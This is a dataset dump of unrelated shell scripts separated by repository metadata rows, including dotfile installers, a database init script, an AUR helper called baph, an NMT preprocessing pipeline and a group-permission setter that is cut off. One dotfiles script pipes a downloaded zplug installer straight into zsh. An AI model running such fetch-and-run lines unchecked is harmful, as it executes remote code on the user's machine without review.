read enterkey
;;
4)
limpiar
echo -e "\e[1;33mSaliendo del script\e[0m"
sleep 1s
limpiar
exit 0
read enterkey
;;
*)
clear
echo "La opcion $opcion no esta en la lista"
read enterkey
;;
esac
done
| true
|
119529d1870ba03af6518c230119c81088584152
|
Shell
|
davidomelettes/flatland
|
/scripts/db_init.sh
|
UTF-8
| 210
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "--INITIALSING DATABASE..."
PGOPTIONS='--client-min-messages=warning' psql -v ON_ERROR_STOP=1 -q -d flatland -f db_init.sql
if [ "$?" -ne "0" ]; then
exit 1
fi
echo "--DATABASE INITIALISED"
| true
|
88a7ef0d51bc374e75a8ae3a2a3214cc4a206cb6
|
Shell
|
majidmvulle/internations-exercise
|
/build.sh
|
UTF-8
| 358
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
env="$1"
if [[ "$env" == "" ]];
then
env="prod"
fi
echo ""
echo "Running composer"
composer install
echo ""
echo "Building Front End"
yarn install
yarn run build --$env
echo ""
echo "Generating database"
bin/console doctrine:database:create
echo ""
echo "Running migrations"
echo "y" | bin/console doctrine:migrations:migrate
| true
|
b32b90e277b3671bbf4e6c413f771889adfda830
|
Shell
|
madumlao/nenv-binstubs
|
/etc/nenv.d/which/nenv-binstubs.bash
|
UTF-8
| 923
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
check_for_binstubs()
{
local root
local binpath
local modules_binpath
root="$PWD"
binpath='bin'
modules_binpath='node_modules/.bin'
while [ -n "$root" ]; do
if [ -f "$root/package.json" ] || [ -f "$root/package-lock.json" ]; then
potential_path="$root/$modules_binpath/$NENV_COMMAND"
if [ -x "$potential_path" ]; then
NENV_COMMAND_PATH="$potential_path"
return
fi
potential_path="$root/$binpath/$NENV_COMMAND"
if [ -x "$potential_path" ]; then
NENV_COMMAND_PATH="$potential_path"
return
fi
fi
root="${root%/*}"
done
# if shim / local version doesnt exist, default to system path
if ! [ -x "$NENV_COMMAND_PATH" ]; then
PATH="$(remove_from_path "${NENV_ROOT}/shims")"
NENV_COMMAND_PATH="$(command -v "$NENV_COMMAND" || true)"
fi
}
if [ -z "$DISABLE_BINSTUBS" ]; then
check_for_binstubs
fi
| true
|
d462fa8a9fa42aa9ca58517fe298fe467c999856
|
Shell
|
e-fujiyuki/dotfiles
|
/init.sh
|
UTF-8
| 4,109
| 3.953125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# functions
exists() {
command -v "$1" > /dev/null 2>&1
}
ask() {
printf "$* [y/N] "
local answer
read answer
case $answer in
"yes" ) return 0 ;;
"y" ) return 0 ;;
* ) return 1 ;;
esac
}
# default
## git directory
if [ ! -d ${HOME}/git ]; then
echo $(tput setaf 2)START: mkdir ~/git $(tput sgr0)
mkdir -p ${HOME}/git
fi
# clone dotfiles
if [ ! -d ${HOME}/git/dotfiles ];then
cd ${HOME}/git
git clone https://github.com/sak39/dotfiles.git
fi
DOT_DIR=${HOME}/git/dotfiles
# Copy ./dotfiles to ${HOME}
echo $(tput setaf 2)START: put symlinks to ~/ $(tput sgr0)
SYMLINK_DIR=${HOME}/git/dotfiles/symlink
cd ${SYMLINK_DIR}
for f in .??*
do
# 無視したいファイルやディレクトリはこんな風に追加してね
# [[ ${f} = ".git" ]] && continue
# [[ ${f} = ".gitignore" ]] && continue
ln -snfv ${SYMLINK_DIR}/${f} ${HOME}/${f}
done
cd ${DOT_DIR}
echo $(tput setaf 2)"Deploy dotfiles complete!. ✔"$(tput sgr0)
# git config
git config --global user.name ${USER}
git config --global user.email ${USER}@gmail.com #todo
git config --global commit.template ${HOME}/.stCommitMsg
git config --global core.excludesfile ${USER}/.gitignore_global
# Configuration for MacOS
case ${OSTYPE} in
darwin*)
echo $(tput setaf 2)"START: configuration for macOS"$(tput sgr0)
CONFIG_MACOS_DIR=${HOME}/git/dotfiles/macos
bash ${CONFIG_MACOS_DIR}/configuration.sh
;;
*)
echo $(tput setaf 4)"ERROR: Working only OS X!!"$(tput sgr0)
exit 1
;;
esac
echo $(tput setaf 2)"Configuration complete. ✔"$(tput sgr0)
## 以降の処理にはzshのインストールが先 ##
if ask "set default shell to '/usr/local/bin/zsh' ?"; then
echo $(tput setaf 2)"START: chsh -s /usr/local/bin/zsh"$(tput sgr0)
BREW_ZSH_LOCATION=$(which zsh)
echo $(tput setaf 1)"DEBUG: ${BREW_ZSH_LOCATION}"$(tput sgr0) #@@
if [ ${BREW_ZSH_LOCATION} != "/usr/local/bin/zsh" ]; then
echo $(tput setaf 4)"ERROR: brew-zsh does not installed!!"$(tput sgr0)
exit 1
fi
# if [ ! -f "/usr/local/bin/zsh" ]; then
# echo $(tput setaf 4)"ERROR: brew-zsh does not installed!!"$(tput sgr0)
# exit 1
# fi
sudo sh -c "echo ${BREW_ZSH_LOCATION} >> /etc/shells"
# If it writes into /etc/shells successfully
if [ $? -eq "0" ]; then
chsh -s ${BREW_ZSH_LOCATION}
echo $(tput setaf 2)"Change shell complete. ✔"$(tput sgr0)
echo $(tput setaf 2)"But.. 'chsh: no changes made' appears in there. In this case, you can change your shell at SystemPreference/User&Groups/AdvancedOptions."$(tput sgr0)
else
echo $(tput setaf 6)"WARNING: Failed writing into /etc/shells"$(tput sgr0)
fi
fi
# normal-zsh are installed?
if ! exists zsh ; then
echo $(tput setaf 4)"ERROR: 'zsh' doesn't installed!!"$(tput sgr0)
exit 1
fi
# Install prezto
if [[ ! -d ${HOME}/.zprezto ]]; then
echo $(tput setaf 2)"START: Install 'zprezto'"$(tput sgr0)
git clone --recursive https://github.com/sorin-ionescu/prezto.git "${ZDOTDIR:-$HOME}/.zprezto"
echo $(tput setaf 2)"'zprezto' installation complete. ✔"$(tput sgr0)
else
echo $(tput setaf 6)"WARNING: 'zprezto' is already installed."$(tput sgr0)
fi
# Install zplug
if [[ ! -d ${HOME}/.zplug ]]; then
echo $(tput setaf 2)"START: Install 'zplug'"$(tput sgr0)
curl -sL --proto-redir -all,https https://zplug.sh/installer | zsh
echo $(tput setaf 2)"'zplug' installation complete. ✔"$(tput sgr0)
else
echo $(tput setaf 6)"WARNING: 'zplug' is already installed."$(tput sgr0)
fi
# SSH key
if ask "Do you want to create ssh key pair?"; then
# todo: .ssh directoryがない状態でのssh-keygenがどのような挙動をするのかを調べる
echo $(tput setaf 2)"START: make ssh key pair"$(tput sgr0)
if exists "ssh-keygen"; then
ssh-keygen -t rsa -C $(whoami) #comment: USER-NAME
echo $(tput setaf 2)"make ssh key pair complete. ✔"$(tput sgr0)
else
echo $(tput setaf 6)"WARNING: 'ssh-keygen' does not installed."$(tput sgr0)
fi
fi
| true
|
f2330d0ea9c0400b1442e5add3085c21882311f2
|
Shell
|
Niharika2404/BasicShellScript
|
/folderexist/checkfolder.sh
|
UTF-8
| 115
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash -x
dir=$1
if [ -d $dir ];
then
echo "folder exist";
else
mkdir -p $dir;
echo "folder created";
fi
| true
|
130d7041bc19383c7f4aff6a5f5e97651e305a13
|
Shell
|
jordykoppen/dotfiles
|
/wallpapers/scripts/random
|
UTF-8
| 189
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/sh
WALLPAPER=$(ls $DOTFILES/wallpapers/images/* | shuf -n 1)
ln -sf -v $WALLPAPER $DOTFILES/wallpapers/current >> /dev/null
feh --bg-fill $DOTFILES/wallpapers/current >> /dev/null
| true
|
843ae9fba1271e28019041ac88aa57b90b59d191
|
Shell
|
Mierdin/devstack-odl
|
/tools/upload_image.sh
|
UTF-8
| 1,029
| 4.03125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# upload_image.sh - Retrieve and upload an image into Glance
#
# upload_image.sh <image-url>
#
# Assumes credentials are set via OS_* environment variables
function usage {
echo "$0 - Retrieve and upload an image into Glance"
echo ""
echo "Usage: $0 <image-url> [...]"
echo ""
echo "Assumes credentials are set via OS_* environment variables"
exit 1
}
# Keep track of the current directory
TOOLS_DIR=$(cd $(dirname "$0") && pwd)
TOP_DIR=$(cd $TOOLS_DIR/..; pwd)
# Import common functions
source $TOP_DIR/functions
# Import configuration
source $TOP_DIR/openrc "" "" "" ""
# Find the cache dir
FILES=$TOP_DIR/files
if [[ -z "$1" ]]; then
usage
fi
# Get a token to authenticate to glance
TOKEN=$(keystone token-get | grep ' id ' | get_field 2)
die_if_not_set $LINENO TOKEN "Keystone fail to get token"
# Glance connection info. Note the port must be specified.
GLANCE_HOSTPORT=${GLANCE_HOSTPORT:-$GLANCE_HOST:9292}
for IMAGE in "$*"; do
upload_image $IMAGE $TOKEN
done
| true
|
0473098e8ef8be9bc1d1cf994f2e00bbc37342a0
|
Shell
|
mzky/Linux-note
|
/资源/linux面授/脚本/while9and9.sh
|
UTF-8
| 204
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
#description Input 9*9
#version 0.1
#author gaomeng
#date 20160816
i=1
while [ $i -le 9 ] ; do
j=1
while [ $j -le $i ] ; do
echo -ne "$j*$i=$[$j*$i]\t"
let j++
done
echo
let i++
done
| true
|
2e0e9fbedcf9dd6ad268c077cb3b7c6f60588b52
|
Shell
|
pradeepkarnam/Shell_Scripting
|
/checkfile.sh
|
UTF-8
| 102
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
read file
if [ -s $file ]
then
echo "file is not empty"
else
echo "file is empty"
fi
| true
|
426eb5a3b89970d8e60c8ad2bf039385b7616814
|
Shell
|
JabinHao/vasp-py
|
/input/convergence.sh
|
UTF-8
| 878
| 3.765625
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
# this script is used to make sure if the task has converged
# Folders should be named in numerical order
# To use it: convergence.sh N,note that N is the number of your tasks
test -d ./1 || (echo "dir not exist" && exit 1)
echo -e "\n"
echo -e "========================================================================================\n"
for (( i = 1; i < $1+1 ; i++))
do
# echo $i
if [ -d $i ]
then
if [ -f $i/input/OUTCAR ]
then
cd $i/input/
result=`grep "reached required" OUTCAR`
if [ -n "$result" ]
then
echo -e "$i\c " && grep "reached required" OUTCAR
else
echo "$i task does not reach convergence"
fi
cd ../..
else
echo "$i task has not completed!"
fi
else
echo "dir $i does not exit"
fi
done
echo -e "\n========================================================================================\n"
| true
|
ce499ba17af87b530b3aa88d3248b485d211e927
|
Shell
|
Bugswriter/baph
|
/baph
|
UTF-8
| 9,767
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# simple package installs
typeset -r AUR='https://aur.archlinux.org'
typeset -r BUILDDIR="$HOME/.cache/aur_builds"
typeset -a PACPKGS=()
typeset -a AURPKGS=()
typeset -A DESC=([s]='search' [u]='update' [i]='install')
typeset -A OPTS=([s]='RUN=search' [u]='RUN=update' [i]='RUN=installp' [n]='NOVIEW=--noview' [N]='NOCONF=--noconfirm' [a]='AURONLY=--auronly')
use()
{ # show the standard help message..
if [[ $1 == '-v' ]]; then
cat << EOF
baph-VERSION
EOF
else
cat << EOF
baph - Simple helper to search, install, and update AUR packages
usage: baph <operation> [options] [package(s)]
operations:
baph {-h --help}
baph {-v --version}
baph {-s --search} <query(s)>
baph {-u --update} [options] [package(s)]
baph {-i --install} [options] <package(s)>
options:
--noview, -n Skip viewing PKGBUILD files
--auronly, -a Only operate on AUR packages
--noconfirm, -N Skip confirmation dialogs
examples:
install 'google-chrome' and 'yay' from the AUR
baph -i google-chrome yay
search for AUR packages matching 'cmus'
baph -s cmus
update all AUR packages on the system, skipping view/confirm dialogs
baph -uanN
EOF
fi
exit 0
}
msg()
{ # print colour $1 :: then message $2 in bold, usage: msg "color" "text"
[[ $1 ]] && printf "%b::\e[0m \e[1m$2\e[0m\n" "$1" || printf "%s\n" "$2"
}
die()
{ # print string $1 and exit with error code $2, usage: die "text" exitcode
printf "\e[1;31merror:\e[0m\t%s\n" "$1" && exit "${2:-1}"
}
get()
{ # install an AUR package.. usage: get "package"
local pkg="$1"
mkdir -p "$BUILDDIR"
rm -rf "${BUILDDIR:?}/$pkg"
cd "$BUILDDIR" || die "failed to change directory to build location"
if hash git >/dev/null 2>&1; then
msg '\e[34m' "Cloning \e[32m$pkg\e[0m\e[1m package repo..."
git clone "$AUR/$pkg" || die "failed to clone package repo: $AUR/$pkg"
else
msg '\e[34m' "Retrieving package: $pkg"
[[ -d "$BUILDDIR/$pkg" ]] && rm -rf "${BUILDDIR:?}/$pkg"
[[ -e "$BUILDDIR/$pkg.tar.gz" ]] && rm -rf "$BUILDDIR/$pkg.tar.gz"
if curl -LO -m 15 "$AUR/cgit/aur.git/snapshot/$pkg.tar.gz" && [[ -e "$BUILDDIR/$pkg.tar.gz" ]]; then
tar -xvf "$pkg.tar.gz" || die "failed to extract package archive: $pkg.tar.gz"
rm -rf "$BUILDDIR/$pkg.tar.gz"
else
die "failed to download requested package: $pkg"
fi
fi
if [[ -r "$BUILDDIR/$pkg/PKGBUILD" ]] && cd "$BUILDDIR/$pkg"; then
view "$BUILDDIR/$pkg/PKGBUILD" || yesno "Continue building $pkg" || { rm -rf "${BUILDDIR:?}/$pkg"; return 1;}
buildp "$BUILDDIR/$pkg/PKGBUILD" || return 1
else
die "$BUILDDIR/$pkg does not contain a PKGBUILD or it is not readable"
fi
return 0
}
view()
{ # view PKGBUILD.. usage: view "/path/to/PKGBUILD"
[[ -z $NOVIEW ]] && yesno "View/Edit the PKGBUILD for $pkg" 1 && { ${EDITOR:-vi} "$1"; return 1; }
return 0
}
keys()
{ # import PGP keys from package.. usage: keys ${KEYS[@]}
for key; do
if ! pacman-key --list-keys | grep -q "$key"; then
msg '\e[33m' "Resolving missing pgp key for $pkg: $key"
if ! gpg --receive-keys "$key" && sudo pacman-key -r "$key" && sudo pacman-key --lsign-key "$key"; then
msg '\e[33m' "Failed to import pgp key, continuing anyway"
fi
fi
done
}
deps()
{ # build package depends.. usage: deps ${DEPENDS[@]}
for dep; do
dep="$(sed 's/[=<>]=\?[0-9.\-]*.*//g' <<< "$dep")"
if ! { pacman -Qsq "^$dep$" || pacman -Ssq "^$dep$"; } >/dev/null 2>&1; then
msg '\e[33m' "Resolving \e[32m$pkg\e[0m\e[1m AUR dependency: $dep"
get "$dep" || die "failed to build dependency $dep"
fi
done
cd "$BUILDDIR/$pkg" || die "failed to cd $BUILDDIR/$pkg"
}
yesno()
{ # ask confirmation if NOCONF is not set, usage: yesno "question"
[[ $NOCONF ]] && return 0
read -re -p $'\e[34m::\e[0m \e[1m'"$1"$'? [Y/n]\e[0m ' c
[[ -z $c || $c == 'y' || $c == 'Y' ]]
}
query()
{ # return key value $1 from json/dict $2, usage: query "key" "input"
# specifically for the response given when querying the AUR for a search
awk -F'","' -v k="$1" '{ for (i=1; i <= NF; i++) { if ($i ~ k) print $i } }' <<< "$2" |
sed 's/.*'"$1"'":"\?\(.*\),\?"\?.*/\1/g; s/[,"]$//g; s/[\\%]//g; s/null,".*$/null/'
}
buildp()
{ # build package.. usage: buildp "/path/to/PKGBUILD"
# this function assumes that we're in the directory containing the PKGBUILD
typeset -i in out # in or out of array
typeset -a depends makedepends validpgpkeys # arrays
typeset arrtext=""
# read the PKGBUILD and grab the depends, makedepends, and validpgpkeys
while read -r line; do
[[ $line =~ ^[\ \ ]*# ]] && continue # skip comments
# determine if were in and/or out an array (including single line arrays)
case "$line" in
depends=*|makedepends=*|validpgpkeys=*)
in=1
[[ $line == *')'* ]] && out=1 # account for just a single line array
;;
*')'*)
(( in )) && out=1
;;
esac
# if were in an array add/start the string
(( in )) && { [[ $arrtext ]] && arrtext+=$'\n'"$line" || arrtext="$line"; }
# if were now out of an array, reset both
(( out )) && out=0 in=0
done < "$1"
# better than evaluating the whole PKGBUILD but still sub-optimal, ideally
# we get the 3 arrays filled with values we need to build the package
eval "$arrtext"
# keys (if any)
(( ${#validpgpkeys[@]} > 0 )) && keys "${validpgpkeys[@]}"
# dependencies
(( ${#depends[@]} || ${#makedepends[@]} )) && deps "${depends[@]}" "${makedepends[@]}"
# build and install it, upon success remove it
makepkg -sicr && { rm -rf ./*.tar.xz >/dev/null 2>&1 || return 0; }
}
search()
{ # search query the AUR, usage: search "query"
for q; do
msg '\e[34m' "Searching the AUR for '$q'...\n"
typeset res="$(curl -Lsm 10 "$AUR"'/rpc.php?type=search&arg='"$q")"
if [[ -z $res || $res == *'"resultcount":0'* ]]; then
printf "\e[1;31m:: \e[0mno results found\n"
else
typeset -i i=1
typeset -a pkgs=()
while read -r key; do
n=$(query "Name" "$key")
v=$(query "Version" "$key")
d=$(query "Description" "$key")
(( ${#d} > ${COLUMNS:-$(tput cols)} )) && d=$(sed 's/\([\.,]\)/\1\\n /' <<< "$d")
[[ $(query "OutOfDate" "$key") != null ]] && v+="\e[1;31m (Out of Date!)"
printf "\e[1;33m%s\e[1;35m AUR/\e[1;37m%s \e[1;32m$v\n\e[0m $d\n" "$i" "$n"
(( i++ ))
pkgs+=("${n//[()]/}")
done < <(sed 's/},{/\n/g' <<< "$res")
if (( i > 1 )) && read -re -p $'\n\nEnter package number(s) to install: ' id && [[ $id =~ [0-9] ]]; then
for num in $id; do
case $num in
''|*[!0-9]*) : ;;
*) AURPKGS+=("${pkgs[$((num - 1))]}") ;;
esac
done
(( ! ${#AURPKGS[@]} )) || installp
fi
fi
done
}
update()
{ # check updates for each package
if (( ! ${#AURPKGS[@]} )); then
mapfile -t AURPKGS < <(pacman -Qqm 2>/dev/null)
[[ $AURONLY ]] || sudo pacman -Syyu $NOCONF
fi
if (( ${#AURPKGS[@]} )); then
msg '\e[34m' "Synchronizing AUR package versions..."
typeset -a needsupdate=() newv=() oldv=() latestver=()
typeset installed="${AURPKGS[*]}"
typeset -i i
mapfile -t newv < <(curl -#L "$AUR/packages/{${installed// /,}}" | awk '/Details:/ {sub(/<\/h.?>/,""); print $4}')
mapfile -t oldv < <(pacman -Q "${AURPKGS[@]}" | awk '{print $2}')
for ((i=0; i < ${#AURPKGS[@]}; i++)); do
if [[ ${newv[$i]} && ${oldv[$i]} && $(vercmp "${oldv[$i]}" "${newv[$i]}") -lt 0 ]]; then
needsupdate+=("${AURPKGS[$i]}")
latestver+=("${newv[$i]}")
printf " %s \e[1m\e[31m%s \e[33m->\e[32m %s\e[0m\n" "${AURPKGS[$i]}" "${oldv[$i]}" "${newv[$i]}"
fi
done
msg '\e[34m' "Starting AUR package upgrade..."
if (( ${#needsupdate[@]} > 0 )); then
printf "\n\e[1mPackages (%s)\e[0m %s\n\n" "${#needsupdate[@]}" "${needsupdate[*]}"
for ((i=0; i < ${#needsupdate[@]}; i++)); do printf "%s" "${needsupdate[$i]}-${latestver[$i]}"; done
yesno "Proceed with package upgrade" && for pkg in "${needsupdate[@]}"; do get "$pkg"; done
else
msg '' " there is nothing to do"
fi
else
msg '\e[34m' "No AUR packages installed.."
fi
exit 0
}
installp()
{ # loop over package array and install each
if (( ${#AURPKGS[@]} || ${#PACPKGS[@]} )); then
(( ! AURONLY && ${#PACPKGS[@]} )) && { sudo pacman -S --noconfirm "${PACPKGS[@]}" $NOCONF || exit 1; }
for pkg in "${AURPKGS[@]}"; do
if (( $(curl -sLI -m 10 "$AUR/packages/$pkg" | awk 'NR==1 {print $2}') == 200 )); then
get "$pkg" || msg '\e[33m' "Exited $pkg build early"
else
die "$v response from $AUR/packages/$pkg"$'\n\ncheck the package name is spelled correctly'
fi
done
else
die "no targets specified"
fi
}
trap 'echo; exit' SIGINT # catch ^C
if (( ! UID )); then
die "do not run baph as root"
elif (( ! $# )); then
die "no operation specified (use -h for help)"
elif ! hash sudo curl >/dev/null 2>&1; then
die "this requires to following packages: sudo, curl\n\n\toptional packages: git"
else
RUN='' ARGS=''
for arg; do # shift long opts to short form
case "$arg" in
--version|--help|--search|--install|--update|--noview|--auronly|--noconfirm)
[[ $arg == '--noconfirm' ]] && arg="${arg^^}"
[[ $ARGS == *"${arg:2:1}"* ]] || ARGS+="${arg:1:2}" ;;
--*) die "invalid option: '$arg'" ;;
-*) [[ $ARGS == *"${arg:1:1}"* ]] || ARGS+="$arg " ;;
*) [[ $ARGS == *"$arg"* ]] || ARGS+="$arg " ;;
esac
done
eval set -- "$ARGS"
while getopts ":hvuisanN" OPT; do
case "$OPT" in
h|v) use "-$OPT" ;;
n|N|a|s|u|i)
[[ $OPT =~ (s|u|i) && $RUN ]] && die "${DESC[$OPT]} and $RUN cannot be used together"
eval "${OPTS[$OPT]}" ;;
\?) die "invalid option: '$OPTARG'" ;;
esac
done
shift $((OPTIND - 1))
if [[ $RUN == 'search' ]]; then
(( $# > 0 )) || die "search requires a query"
$RUN "$@"
else
for arg; do
pacman -Ssq "^$arg$" >/dev/null 2>&1 && PACPKGS+=("$arg") || AURPKGS+=("$arg")
done
$RUN
fi
fi
# vim:fdm=marker:fmr={,}
| true
|
88211a70a0a9e4a1f630044e031456fb29e4117d
|
Shell
|
RailsonPFrazao/lista11
|
/questao1.sh
|
UTF-8
| 476
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash
read -p "Escolha o arquivo a ser alterado:" arq
read -p "Escolha entre as opções a- remove todas as letras do arquivo, b- remove todos os digitos do arquivo, c- remove todos os carcteres que não são nem letras nem dígitos de um arquivo:" op
[ "$op" = "a" ] && val=$(sed 's/[a-zA-Z]//g' $arq) && echo $val > $arq
[ "$op" = "b" ] && val=$(sed 's/[0-9]//g' $arq) && echo $val > $arq
[ "$op" = "c" ] && val=$(sed 's/[[:punct:]]//g' $arq) && echo $val > $arq
| true
|
561bf767d017c971daa251fed4bbdd0025f08142
|
Shell
|
vaishnavisirsat/Day5
|
/Arithmetic.sh
|
UTF-8
| 327
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash -x
read -p "Enter first number : " a
read -p "Enter second number : " b
read -p "Enter third number : " c
result=$(($a+$b*$c))
echo "a + b * c :$result"
result=$(($c + $a / $b))
echo "c + a / b : $result"
result=$(($a % $b + $c))
echo "a % b + c : $result"
result=$(($a * $b + $c))
echo "a + b + c : $result"
| true
|
08df237c392c42ee0be5a5d00c75175f1be6dc66
|
Shell
|
JanusL/nlp-project
|
/preprocess.sh
|
UTF-8
| 2,841
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Tokenizing testset...."
python scripts/cleanup.py --input data/nlp/asistent_testset.en --output data/nlp/src-test-clean.txt & \
python scripts/cleanup.py --input data/nlp/asistent_testset.sl --output data/nlp/tgt-test-clean.txt
python scripts/bert_tokenize.py --input data/nlp/src-test-clean.txt --output data/nlp/src-test-token.txt & \
python scripts/bert_tokenize.py --input data/nlp/tgt-test-clean.txt --output data/nlp/tgt-test-token.txt
wait
echo "Tokenizing TC3... It has more than 24 000 000 lines, so this will take about 2 hours..."
python scripts/cleanup.py --input data/nlp/TC3.en --output data/nlp/src-clean.txt & \
python scripts/cleanup.py --input data/nlp/TC3.sl --output data/nlp/tgt-clean.txt
python scripts/bert_tokenize.py --input data/nlp/src-clean.txt --output data/nlp/src-token.txt & \
python scripts/bert_tokenize.py --input data/nlp/tgt-clean.txt --output data/nlp/tgt-token.txt
wait
declare -a arr=("random" "spook" "trans" "wikimedia" "wikipedia")
for i in "${arr[@]}"
do
echo "Tokenizing $i...."
python scripts/cleanup.py --input data/$i/src-raw.txt --output data/$i/src-clean.txt & \
python scripts/cleanup.py --input data/$i/tgt-raw.txt --output data/$i/tgt-clean.txt
python scripts/bert_tokenize.py --input data/$i/src-clean.txt --output data/$i/src-token.txt & \
python scripts/bert_tokenize.py --input data/$i/tgt-clean.txt --output data/$i/tgt-token.txt
wait
done
echo "Tokenizing orwel...."
python scripts/cleanup.py --input data/orwel/elan-orwl-en.txt --output data/orwel/src-clean.txt & \
python scripts/cleanup.py --input data/orwel/elan-orwl-sl.txt --output data/orwel/tgt-clean.txt
python scripts/bert_tokenize.py --input data/orwel/src-clean.txt --output data/orwel/src-token.txt & \
python scripts/bert_tokenize.py --input data/orwel/tgt-clean.txt --output data/orwel/tgt-token.txt
wait
echo "Tokenizing hp..."
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L004-en.txt --output data/spook/src-clean-hp.txt & \
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L004-sl.txt --output data/spook/tgt-clean-hp.txt
python scripts/bert_tokenize.py --input data/spook/src-clean-hp.txt --output data/spook/src-token-hp.txt & \
python scripts/bert_tokenize.py --input data/spook/tgt-clean-hp.txt --output data/spook/tgt-token-hp.txt
wait
echo "Tokenizing lotr..."
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L005-en.txt --output data/spook/src-clean-lotr.txt & \
python scripts/cleanup.py --input data/spook/text/spook_en-sl_L005-sl.txt --output data/spook/tgt-clean-lotr.txt
python scripts/bert_tokenize.py --input data/spook/src-clean-lotr.txt --output data/spook/src-token-lotr.txt & \
python scripts/bert_tokenize.py --input data/spook/tgt-clean-lotr.txt --output data/spook/tgt-token-lotr.txt
| true
|
99faf7ea9f6f98337097eae3956e85f205a81fae
|
Shell
|
flw-cn/shell-profiles
|
/install.sh
|
UTF-8
| 2,395
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# vim: set fdm=marker:
REPO_PATH=~/.flw-shell-profiles
REPO_NAME=$(basename $REPO_PATH)
install() {
dotname=$(basename $1)
realname=${dotname/#dot_/.}
if [ -z "$realname" ]; then
echo Cannot install $dotname.
return
fi
echo -n Install ~/$realname...
rm -f ~/$realname
ln -s $REPO_NAME/$dotname ~/$realname
echo done
}
# dot_config 的方案还有问题:
# TODO: macOS 和 FreeBSD 上和其它软件的配置方法冲突怎么办,特别是 XDE 中
# install dot_config # 尽量通过 ~/.config/ 目录来配置,这样更集中
install dot_bash_profile_flw
install dot_bashrc_flw
install dot_zshrc
install dot_screenrc # screen 配置文件
install dot_tmux.conf # tmux 和 tmate 的配置文件
install dot_tmux-copy-mode.conf # tmux 复制模式的配置文件,tmate 不支持所以另放
install dot_fzf.zsh # fzf 配置文件
install dot_inputrc # readline 配置文件
install dot_gdbinit # gdb 启动脚本
install dot_guile # guile 启动脚本
install dot_sbclrc # sbcl 启动脚本
install dot_haskeline # Haskell REPL 配置,另外还要注意在 tmux 下配合修改
install dot_racketrc # Racket 启动配置
install dot_editrc # Racket REPL 配置,另外还需要在 racketrc 里加载 xrepl
install dot_gitconfig # Git 配置文件
install dot_gitmessage # Git 提交日志模版
# 安装 bash 启动脚本 {{{
touch ~/.bash_profile
perl -i -lne 'print unless /# flw bash script begin/../# flw bash script end/' ~/.bash_profile
cat <<EOD >> ~/.bash_profile
# flw bash script begin
if [ -e ~/.bash_profile_flw ]; then
. ~/.bash_profile_flw
fi
# flw bash script end
EOD
touch ~/.bashrc
perl -i -lne 'print unless /# flw bash script begin/../# flw bash script end/' ~/.bashrc
cat <<EOD >> ~/.bashrc
# flw bash script begin
if [ -e ~/.bashrc_flw ]; then
. ~/.bashrc_flw
fi
# flw bash script end
EOD
# }}}
# 安装 oh-my-zsh 以及 zsh 启动脚本 {{{
git clone https://github.com/robbyrussell/oh-my-zsh.git ~/.oh-my-zsh
ln -s $REPO_PATH/flw.zsh-theme ~/.oh-my-zsh/custom/themes/flw.zsh-theme
# }}}
# 安装 docker 配置文件 {{{
rm -f ~/.docker
ln -s ~/.config/docker ~/.docker
# }}}
| true
|
fa088fa7307563a48b3d33e24e7454d081fa2222
|
Shell
|
esbenab/AD-Udvidelse
|
/makeGroupShares/setgroup.sh
|
UTF-8
| 3,798
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
#title :setgoup.sh
#description :Sets the group and rights for a given directory recursively
#author :Esben A Black (DKSAS30)
#date :10 juli 2015
#version :1.0
#usage :setgroup.sh groupname permission_pattern path
#==============================================================================
set -euf -o pipefail
if [ "$EUID" -ne 0 ]
then
echo "Program must be run as root"
exit 1
fi
# echo to stderr
echoerr() { cat <<< "$@" 1>&2; }
# return to original dir on error exit
exitError() {
popd > /dev/null
exit $1
}
# Make sure any temporary files are secured:
umask 0177
if [ -f $(dirname "$0")/setgroup.cfg ]
then
if [ "$(stat -c "%a %u" $(dirname "$0")/setgroup.cfg)" != "640 0" ];
then
echoerr "Config file $(dirname "$0")/setgroup.cfg must be owned by root at have permissions: 640"
echoerr "Make sure the file conforms to the description in the header."
exit 1
fi;
source "$(dirname "$0")/setgroup.cfg";
else
echoerr "Config file $(dirname "$0")/setgroup.cfg must exist and be owned by root, having permissions 640"
exit 1
fi;
function usage(){
printf "Usage: %s: [-R] -g groupname [-g groupname] -p pattern path\n" "$(basename $0)"
echo "-R recursively: apply the changes"
echo "-g groupname: list the groups that should have the pattern described"
}
function argumenterror(){
echo "Argument missing from -$@ option\n $use"
usage
exitError 2
}
#set flags
mandetorygroup=false
mandetorypattern=false
recursive=
groupnames=
while getopts ":Rg:p:h" opt; do
case "$opt" in
# First we need to check if the settings should be applied recursively
R)
recursive=-R
;;
# we need to assign groups to the groupnames variable
g)
mandetorygroup=true
if [[ $OPTARG != -* ]]
then
if [ -n "$groupnames" ]
then
groupnames="$groupnames $OPTARG"
else
groupnames=$OPTARG
fi
else
argumenterror $opt
fi
;;
# we need a permission pattern to apply
p)
if [[ "$OPTARG" != -* ]] && [[ ${OPTARG} =~ [\-0-7r][\-0-7w][\-0-7x].* ]]
then
mandetorypattern=true
pattern=$OPTARG
else
if [[ ${OPTARG} =~ [\-0-7r][\-0-7w][\-0-7x].* ]]
then
echoerr 'permission patern must match "[r-][w-][x-]" example: r-x or rw-'
usage
exitError 1
fi
argumenterror $opt
fi
;;
# woops here we catch missing arguments
\:) argumenterror $OPTARG
;;
# print help
h)
usage
;;
# say what ? the options was not understood
\?)
echoerr "Invalid option: -$OPTARG"
usage
;;
esac
done
echo $@
shift $(($OPTIND - 1))
echo $@
path="$*"
pushd $path > /dev/null
# we make sure that the mandetory options are set
